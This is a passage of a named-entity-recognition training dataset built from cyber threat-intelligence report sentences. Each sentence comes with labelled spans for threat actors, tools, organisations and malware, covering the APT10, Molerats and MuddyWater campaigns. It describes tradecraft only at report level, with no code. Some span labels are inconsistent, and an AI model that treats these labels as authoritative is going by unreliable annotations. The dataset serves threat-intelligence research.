client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of 
other victims .", "spans": {"ORGANIZATION: MSPs": [[41, 45]], "THREAT_ACTOR: APT10": [[58, 63]], "TOOL: MSP": [[87, 90]]}, "info": {"id": "dnrti_train_000930", "source": "dnrti_train"}} {"text": "This , in turn , would provide access to a larger amount of intellectual property and sensitive data .", "spans": {}, "info": {"id": "dnrti_train_000931", "source": "dnrti_train"}} {"text": "APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: MSPs": [[75, 79]]}, "info": {"id": "dnrti_train_000932", "source": "dnrti_train"}} {"text": "The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains .", "spans": {"THREAT_ACTOR: APT10": [[56, 61]], "TOOL: dynamic-DNS domains": [[123, 142]]}, "info": {"id": "dnrti_train_000933", "source": "dnrti_train"}} {"text": "Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs .", "spans": {"THREAT_ACTOR: APT10": [[95, 100]], "ORGANIZATION: MSPs": [[132, 136]]}, "info": {"id": "dnrti_train_000934", "source": "dnrti_train"}} {"text": "The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan .", "spans": {"THREAT_ACTOR: APT10": [[98, 103]]}, "info": {"id": "dnrti_train_000935", "source": "dnrti_train"}} {"text": "These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies .", "spans": {"ORGANIZATION: companies": [[144, 153]]}, "info": {"id": "dnrti_train_000936", "source": "dnrti_train"}} {"text": "APT10 has , in the past , primarily been known for its targeting of government and US defence industrial base organisations , with 
the earliest known date of its activity being in December 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_000937", "source": "dnrti_train"}} {"text": "Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China .", "spans": {"THREAT_ACTOR: APT10": [[9, 14]]}, "info": {"id": "dnrti_train_000938", "source": "dnrti_train"}} {"text": "In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient .", "spans": {"THREAT_ACTOR: APT actor": [[27, 36]], "THREAT_ACTOR: threat actor": [[57, 69]], "TOOL: decoy documents": [[81, 96]]}, "info": {"id": "dnrti_train_000939", "source": "dnrti_train"}} {"text": "This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX .", "spans": {"THREAT_ACTOR: APT10": [[37, 42]], "TOOL: Poison Ivy": [[123, 133]], "TOOL: PlugX": [[137, 142]]}, "info": {"id": "dnrti_train_000940", "source": "dnrti_train"}} {"text": "We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials .", "spans": {"THREAT_ACTOR: APT10": [[37, 42]], "TOOL: MSP": [[75, 78]], "ORGANIZATION: MSPs": [[105, 109]]}, "info": {"id": "dnrti_train_000941", "source": "dnrti_train"}} {"text": "In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B .", "spans": {"THREAT_ACTOR: APT10": [[43, 48]], "TOOL: mimikatz": [[100, 108]], "TOOL: PwDump": [[112, 118]], "TOOL: DLL load order hijacking": [[137, 161]]}, "info": {"id": "dnrti_train_000942", "source": "dnrti_train"}} {"text": "APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure 
the malware remains active regardless of system reboots .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: scheduled tasks": [[61, 76]], "TOOL: Windows services": [[80, 96]]}, "info": {"id": "dnrti_train_000943", "source": "dnrti_train"}} {"text": "For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators .", "spans": {"THREAT_ACTOR: threat actor": [[99, 111]]}, "info": {"id": "dnrti_train_000944", "source": "dnrti_train"}} {"text": "In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network .", "spans": {"THREAT_ACTOR: APT10": [[29, 34]], "TOOL: reverse shell": [[49, 62]], "TOOL: RDP": [[66, 69]], "THREAT_ACTOR: actor": [[110, 115]]}, "info": {"id": "dnrti_train_000945", "source": "dnrti_train"}} {"text": "The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing .", "spans": {"TOOL: EvilGrab": [[36, 44]], "TOOL: ChChes": [[55, 61]], "TOOL: RedLeaves": [[80, 89]]}, "info": {"id": "dnrti_train_000946", "source": "dnrti_train"}} {"text": "Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest .", "spans": {}, "info": {"id": "dnrti_train_000947", "source": "dnrti_train"}} {"text": "We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools .", "spans": {"THREAT_ACTOR: APT10": [[22, 27]]}, "info": {"id": "dnrti_train_000948", "source": "dnrti_train"}} {"text": "For example , PwC UK has observed 
APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads .", "spans": {"ORGANIZATION: PwC UK": [[14, 20]], "THREAT_ACTOR: APT10": [[34, 39]], "TOOL: Mimikatz": [[78, 86]], "TOOL: PwDump6": [[91, 98]], "TOOL: signed software": [[124, 139]]}, "info": {"id": "dnrti_train_000949", "source": "dnrti_train"}} {"text": "During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 .", "spans": {"THREAT_ACTOR: APT10": [[65, 70]]}, "info": {"id": "dnrti_train_000950", "source": "dnrti_train"}} {"text": "We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves .", "spans": {"TOOL: Quasar malware": [[63, 77]], "TOOL: ChChes": [[133, 139]], "TOOL: RedLeaves": [[144, 153]]}, "info": {"id": "dnrti_train_000951", "source": "dnrti_train"}} {"text": "APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "THREAT_ACTOR: threat actor": [[63, 75]]}, "info": {"id": "dnrti_train_000952", "source": "dnrti_train"}} {"text": "Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns .", "spans": {"THREAT_ACTOR: APT10": [[43, 48]]}, "info": {"id": "dnrti_train_000953", "source": "dnrti_train"}} {"text": "This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims .", "spans": {"ORGANIZATION: managed IT service providers": [[28, 56]], "THREAT_ACTOR: APT10": [[92, 97]]}, "info": {"id": "dnrti_train_000955", "source": "dnrti_train"}} {"text": "An additional campaign has 
also been observed targeting Japanese entities .", "spans": {}, "info": {"id": "dnrti_train_000956", "source": "dnrti_train"}} {"text": "APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue .", "spans": {"THREAT_ACTOR: APT10": [[0, 5], [214, 219]], "THREAT_ACTOR: threat actors": [[99, 112]]}, "info": {"id": "dnrti_train_000957", "source": "dnrti_train"}} {"text": "The threat actor 's known working hours align to Chinese Standard Time ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "THREAT_ACTOR: threat actors": [[144, 157]], "THREAT_ACTOR: APT10": [[228, 233]]}, "info": {"id": "dnrti_train_000958", "source": "dnrti_train"}} {"text": "APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "THREAT_ACTOR: MenuPass Group": [[8, 22]], "THREAT_ACTOR: cyber espionage group": [[38, 59]], "ORGANIZATION: FireEye": [[65, 72]]}, "info": {"id": "dnrti_train_000959", "source": "dnrti_train"}} {"text": "Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. 
defense industrial base .", "spans": {"ORGANIZATION: military organizations": [[24, 46]], "ORGANIZATION: defense industrial base": [[156, 179]]}, "info": {"id": "dnrti_train_000960", "source": "dnrti_train"}} {"text": "Moafee may have chosen its targets based on the rich resources of South China Sea region – the world 's second business sea-lane , according to Wikipedia – including rare earth metals , crude oil , and natural gas .", "spans": {"THREAT_ACTOR: Moafee": [[0, 6]]}, "info": {"id": "dnrti_train_000961", "source": "dnrti_train"}} {"text": "DragonOK appears to operate out of China 's Jiangsu Province .", "spans": {"THREAT_ACTOR: DragonOK": [[0, 8]]}, "info": {"id": "dnrti_train_000962", "source": "dnrti_train"}} {"text": "Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit Tool ( HTRAN ) – to disguise their geographical locations .", "spans": {"THREAT_ACTOR: Moafee": [[0, 6]], "THREAT_ACTOR: DragonOK": [[11, 19]], "TOOL: HUC Packet Transmit Tool": [[55, 79]], "TOOL: HTRAN": [[82, 87]]}, "info": {"id": "dnrti_train_000963", "source": "dnrti_train"}} {"text": "However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups .", "spans": {"ORGANIZATION: FireEye": [[10, 17]], "THREAT_ACTOR: Moafee": [[107, 113]], "THREAT_ACTOR: DragonOK groups": [[118, 133]]}, "info": {"id": "dnrti_train_000964", "source": "dnrti_train"}} {"text": "Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim .", "spans": {"THREAT_ACTOR: Moafee": [[5, 11]], "THREAT_ACTOR: DragonOK": [[16, 24]]}, "info": {"id": "dnrti_train_000965", "source": "dnrti_train"}} {"text": "Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": {"MALWARE: Attachments": [[0, 11]]}, "info": {"id": "dnrti_train_000966", "source": "dnrti_train"}} {"text": "We observed 
Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers – all operated on CHINANET , and hosted in Guangdong Province .", "spans": {"THREAT_ACTOR: Moafee": [[12, 18]], "TOOL: HTRAN": [[27, 32]]}, "info": {"id": "dnrti_train_000967", "source": "dnrti_train"}} {"text": "Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province .", "spans": {"THREAT_ACTOR: Moafee group": [[9, 21]], "THREAT_ACTOR: DragonOK": [[36, 44]], "TOOL: HTRAN": [[53, 58]]}, "info": {"id": "dnrti_train_000968", "source": "dnrti_train"}} {"text": "Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources .", "spans": {"THREAT_ACTOR: Moafee": [[110, 116]]}, "info": {"id": "dnrti_train_000969", "source": "dnrti_train"}} {"text": "Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well .", "spans": {}, "info": {"id": "dnrti_train_000971", "source": "dnrti_train"}} {"text": "and as discovered later , even the U.S. 
and UK governments .", "spans": {}, "info": {"id": "dnrti_train_000972", "source": "dnrti_train"}} {"text": "The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan .", "spans": {"THREAT_ACTOR: group": [[11, 16]], "THREAT_ACTOR: DragonOK": [[28, 36]], "ORGANIZATION: high-tech": [[47, 56]], "ORGANIZATION: manufacturing companies": [[61, 84]]}, "info": {"id": "dnrti_train_000973", "source": "dnrti_train"}} {"text": "In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East .", "spans": {"TOOL: XtremeRAT": [[63, 72]], "THREAT_ACTOR: attackers": [[120, 129]]}, "info": {"id": "dnrti_train_000974", "source": "dnrti_train"}} {"text": "But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China — so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China .", "spans": {"THREAT_ACTOR: group": [[8, 13]], "TOOL: Poison Ivy": [[28, 38]], "TOOL: PIVY": [[41, 45], [127, 131]], "TOOL: RAT": [[52, 55]], "THREAT_ACTOR: threat actors": [[86, 99]]}, "info": {"id": "dnrti_train_000975", "source": "dnrti_train"}} {"text": "This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. 
We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": {"TOOL: PIVY": [[70, 74]], "MALWARE: malicious files": [[298, 313]]}, "info": {"id": "dnrti_train_000976", "source": "dnrti_train"}} {"text": "We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal .", "spans": {"TOOL: PIVY": [[29, 33]], "THREAT_ACTOR: threat actors": [[107, 120]], "TOOL: RAT": [[218, 221]]}, "info": {"id": "dnrti_train_000977", "source": "dnrti_train"}} {"text": "We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control ( CnC ) infrastructure used by the Molerats attackers .", "spans": {"TOOL: PIVY": [[113, 117]], "TOOL: command-and-control": [[144, 163]], "TOOL: CnC": [[166, 169]], "THREAT_ACTOR: Molerats": [[199, 207]], "THREAT_ACTOR: attackers": [[208, 217]]}, "info": {"id": "dnrti_train_000978", "source": "dnrti_train"}} {"text": "The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"MALWARE: .exe file": [[24, 33]], "MALWARE: Microsoft Word file": [[61, 80]]}, "info": {"id": "dnrti_train_000979", "source": "dnrti_train"}} {"text": "In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net .", "spans": {"TOOL: DustySky": [[15, 23]], "THREAT_ACTOR: attackers": [[30, 39]], "TOOL: publicly available tools": [[44, 68]], "TOOL: Remote Administration Tools": [[91, 118]], "TOOL: RAT": [[121, 124]], "TOOL: Poison Ivy": [[129, 139]], "TOOL: 
Nano Core": [[142, 151]], "TOOL: XtremeRAT": [[154, 163]], "TOOL: DarkComet": [[166, 175]], "TOOL: Spy-Net": [[180, 187]]}, "info": {"id": "dnrti_train_000980", "source": "dnrti_train"}} {"text": "DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 .", "spans": {"TOOL: DustySky": [[0, 8]]}, "info": {"id": "dnrti_train_000981", "source": "dnrti_train"}} {"text": "It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering .", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "THREAT_ACTOR: Gaza cybergang": [[35, 49]], "THREAT_ACTOR: group": [[78, 83]]}, "info": {"id": "dnrti_train_000982", "source": "dnrti_train"}} {"text": "Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC .", "spans": {"THREAT_ACTOR: Molerats group": [[27, 41]], "ORGANIZATION: Norman": [[75, 81]], "ORGANIZATION: Kaspersky": [[84, 93]], "ORGANIZATION: FireEye": [[96, 103]], "ORGANIZATION: PwC": [[110, 113]]}, "info": {"id": "dnrti_train_000983", "source": "dnrti_train"}} {"text": "DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering .", "spans": {"TOOL: DustySky": [[0, 8]], "THREAT_ACTOR: Molerats": [[55, 63]], "THREAT_ACTOR: Gaza cybergang": [[72, 86]], "THREAT_ACTOR: terrorist group": [[95, 110]]}, "info": {"id": "dnrti_train_000984", "source": "dnrti_train"}} {"text": "Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq .", "spans": {}, "info": {"id": "dnrti_train_000985", "source": "dnrti_train"}} {"text": "The United States and countries in Europe are targeted as well .", "spans": {}, "info": {"id": "dnrti_train_000986", "source": "dnrti_train"}} {"text": "The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 
2015 .", "spans": {}, "info": {"id": "dnrti_train_000987", "source": "dnrti_train"}} {"text": "The MuddyWater attacks are primarily against Middle Eastern nations .", "spans": {}, "info": {"id": "dnrti_train_000988", "source": "dnrti_train"}} {"text": "However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA .", "spans": {}, "info": {"id": "dnrti_train_000989", "source": "dnrti_train"}} {"text": "The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[4, 30]], "MALWARE: malicious files": [[78, 93]], "ORGANIZATION: MalwareBytes": [[194, 206]]}, "info": {"id": "dnrti_train_000991", "source": "dnrti_train"}} {"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" .", "spans": {"TOOL: PowerShell-based first stage backdoor": [[69, 106]], "TOOL: POWERSTATS": [[117, 127]]}, "info": {"id": "dnrti_train_000992", "source": "dnrti_train"}} {"text": "When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 .", "spans": {"THREAT_ACTOR: FIN7": [[219, 223]]}, "info": {"id": "dnrti_train_000993", "source": "dnrti_train"}} {"text": "Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" .", "spans": {"THREAT_ACTOR: FIN7": [[62, 66]], "TOOL: MuddyWater C2": [[123, 136]], "TOOL: non-public tool": [[144, 159]], "TOOL: DNSMessenger": [[162, 174]]}, "info": {"id": "dnrti_train_000995", "source": "dnrti_train"}} {"text": "There was a mistake in the 
original Morphisec analysis which linked these attacks to FIN7 .", "spans": {"ORGANIZATION: Morphisec": [[36, 45]], "THREAT_ACTOR: FIN7": [[85, 89]]}, "info": {"id": "dnrti_train_000996", "source": "dnrti_train"}} {"text": "The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups .", "spans": {"TOOL: DNSMessenger malware": [[4, 24]], "THREAT_ACTOR: FIN7": [[52, 56]], "THREAT_ACTOR: MuddyWater": [[59, 69]], "THREAT_ACTOR: groups": [[88, 94]]}, "info": {"id": "dnrti_train_000997", "source": "dnrti_train"}} {"text": "In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation .", "spans": {"THREAT_ACTOR: Seedworm": [[41, 49]], "THREAT_ACTOR: espionage group": [[58, 73]], "THREAT_ACTOR: APT28": [[74, 79]], "THREAT_ACTOR: Swallowtail": [[86, 97]], "THREAT_ACTOR: Fancy Bear": [[100, 110]], "ORGANIZATION: embassy": [[153, 160]]}, "info": {"id": "dnrti_train_000998", "source": "dnrti_train"}} {"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": {"TOOL: Powermud backdoor": [[29, 46]], "MALWARE: Backdoor.Powemuddy": [[66, 84]], "TOOL: custom tools": [[93, 105]], "MALWARE: makecab.exe": [[238, 249]]}, "info": {"id": "dnrti_train_000999", "source": "dnrti_train"}} {"text": "Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests .", "spans": {"THREAT_ACTOR: Seedworm": [[0, 8]], "THREAT_ACTOR: cyber espionage group": [[31, 52]]}, "info": {"id": "dnrti_train_001000", "source": "dnrti_train"}} {"text": "During the operations , the group used tools consistent with those 
leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts .", "spans": {"THREAT_ACTOR: group": [[28, 33]], "TOOL: Powermud": [[110, 118]], "THREAT_ACTOR: Seedworm group": [[147, 161]], "TOOL: customized PowerShell": [[168, 189]], "TOOL: LaZagne": [[192, 199]], "TOOL: Crackmapexec scripts": [[206, 226]]}, "info": {"id": "dnrti_train_001001", "source": "dnrti_train"}} {"text": "The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location .", "spans": {"THREAT_ACTOR: Seedworm group": [[4, 18]], "TOOL: Powermud backdoor": [[32, 49]], "TOOL: command-and-control": [[99, 118]]}, "info": {"id": "dnrti_train_001002", "source": "dnrti_train"}} {"text": "After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals .", "spans": {"TOOL: Powermud": [[54, 62]], "TOOL: Powemuddy": [[66, 75]], "THREAT_ACTOR: Seedworm": [[78, 86]]}, "info": {"id": "dnrti_train_001003", "source": "dnrti_train"}} {"text": "Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials .", "spans": {"THREAT_ACTOR: Seedworm": [[0, 8]], "TOOL: LaZagne": [[45, 52]], "TOOL: Crackmapexec": [[57, 69]]}, "info": {"id": "dnrti_train_001004", "source": "dnrti_train"}} {"text": "The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Seedworm": [[26, 34]], "THREAT_ACTOR: MuddyWater": [[41, 51]]}, "info": {"id": "dnrti_train_001005", "source": "dnrti_train"}} {"text": "The Seedworm group is the only group known to 
use the Powermud backdoor .", "spans": {"THREAT_ACTOR: Seedworm group": [[4, 18]], "THREAT_ACTOR: group": [[31, 36]], "TOOL: Powermud backdoor": [[54, 71]]}, "info": {"id": "dnrti_train_001006", "source": "dnrti_train"}} {"text": "Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East .", "spans": {"THREAT_ACTOR: group": [[19, 24]]}, "info": {"id": "dnrti_train_001007", "source": "dnrti_train"}} {"text": "MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "THREAT_ACTOR: threat actor": [[38, 50]]}, "info": {"id": "dnrti_train_001008", "source": "dnrti_train"}} {"text": "Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": {"TOOL: DNSMessenger": [[67, 79]], "TOOL: MuddyWater": [[84, 94]]}, "info": {"id": "dnrti_train_001009", "source": "dnrti_train"}} {"text": "Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia .", "spans": {"TOOL: fake resume application": [[63, 86]], "TOOL: letter": [[94, 100]]}, "info": {"id": "dnrti_train_001012", "source": "dnrti_train"}} {"text": "Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[16, 67]], "ORGANIZATION: MATI": [[70, 74]], "MALWARE: Backdoor.Powemuddy": [[110, 128]], "THREAT_ACTOR: Seedworm": [[147, 155]], "MALWARE: Powermud backdoor": [[159, 176]], 
"TOOL: POWERSTATS": [[183, 193]], "THREAT_ACTOR: group": [[230, 235], [306, 311]]}, "info": {"id": "dnrti_train_001013", "source": "dnrti_train"}} {"text": "From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East .", "spans": {"ORGANIZATION: FireEye 's Dynamic Threat Intelligence": [[42, 80]], "THREAT_ACTOR: attackers": [[95, 104]]}, "info": {"id": "dnrti_train_001014", "source": "dnrti_train"}} {"text": "MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "ORGANIZATION: defense entities": [[68, 84]]}, "info": {"id": "dnrti_train_001015", "source": "dnrti_train"}} {"text": "This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": {"THREAT_ACTOR: actor": [[5, 10]], "ORGANIZATION: defense entities": [[68, 84]]}, "info": {"id": "dnrti_train_001016", "source": "dnrti_train"}} {"text": "When successfully executed , the malicious documents install a backdoor we track as POWERSTATS .", "spans": {"TOOL: backdoor": [[63, 71]], "TOOL: POWERSTATS": [[84, 94]]}, "info": {"id": "dnrti_train_001017", "source": "dnrti_train"}} {"text": "The group is known for espionage campaigns in the Middle East .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_001018", "source": "dnrti_train"}} {"text": "The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques .", "spans": {"THREAT_ACTOR: threat group": [[4, 16]]}, "info": {"id": "dnrti_train_001019", "source": "dnrti_train"}} {"text": "The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts 
deployed via Microsoft Office Word macro .", "spans": {"TOOL: PowerShell scripts": [[114, 132]], "TOOL: Microsoft": [[146, 155]], "TOOL: Office Word": [[156, 167]]}, "info": {"id": "dnrti_train_001020", "source": "dnrti_train"}} {"text": "The threat group in this recently observed campaign a TEMP.Zagros a weaponized their malware using the following techniques .", "spans": {"THREAT_ACTOR: threat group": [[4, 16]]}, "info": {"id": "dnrti_train_001021", "source": "dnrti_train"}} {"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": {"MALWARE: Microsoft Word document": [[60, 83]]}, "info": {"id": "dnrti_train_001022", "source": "dnrti_train"}} {"text": "MuddyWater is a relatively new APT that surfaced in 2017 .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "THREAT_ACTOR: APT": [[31, 34]]}, "info": {"id": "dnrti_train_001023", "source": "dnrti_train"}} {"text": "We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[30, 41]], "ORGANIZATION: Palo Alto Networks": [[56, 74]], "ORGANIZATION: Trend Micro": [[79, 90]], "THREAT_ACTOR: MuddyWater": [[94, 104]], "THREAT_ACTOR: actor": [[123, 128]]}, "info": {"id": "dnrti_train_001024", "source": "dnrti_train"}} {"text": "We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[30, 41]], "ORGANIZATION: Palo Alto Networks": [[56, 74]], "ORGANIZATION: Trend Micro": [[79, 90]], "THREAT_ACTOR: actor": [[109, 114]]}, "info": {"id": "dnrti_train_001025", "source": "dnrti_train"}} {"text": "Entities in these sectors are often \" enabling victims \" as 
telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise .", "spans": {"ORGANIZATION: telecommunications providers": [[60, 88]], "ORGANIZATION: IT services agencies": [[92, 112]], "THREAT_ACTOR: Seedworm actors": [[139, 154]]}, "info": {"id": "dnrti_train_001026", "source": "dnrti_train"}} {"text": "The group mainly targets the telecommunications and IT services sectors .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: telecommunications": [[29, 47]], "ORGANIZATION: IT services sectors": [[52, 71]]}, "info": {"id": "dnrti_train_001027", "source": "dnrti_train"}} {"text": "However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US .", "spans": {"THREAT_ACTOR: group": [[14, 19]], "THREAT_ACTOR: MuddyWater": [[27, 37]]}, "info": {"id": "dnrti_train_001028", "source": "dnrti_train"}} {"text": "MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_001031", "source": "dnrti_train"}} {"text": "As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors .", "spans": {"THREAT_ACTOR: MuddyWater": [[3, 13]], "TOOL: POWERSTATS": [[42, 52]], "THREAT_ACTOR: actors": [[123, 129]]}, "info": {"id": "dnrti_train_001032", "source": "dnrti_train"}} {"text": "In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater .", "spans": {"ORGANIZATION: Trend Micro": [[16, 27]], "THREAT_ACTOR: MuddyWater": [[104, 114]]}, "info": {"id": "dnrti_train_001033", "source": "dnrti_train"}} {"text": "In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"ORGANIZATION: 
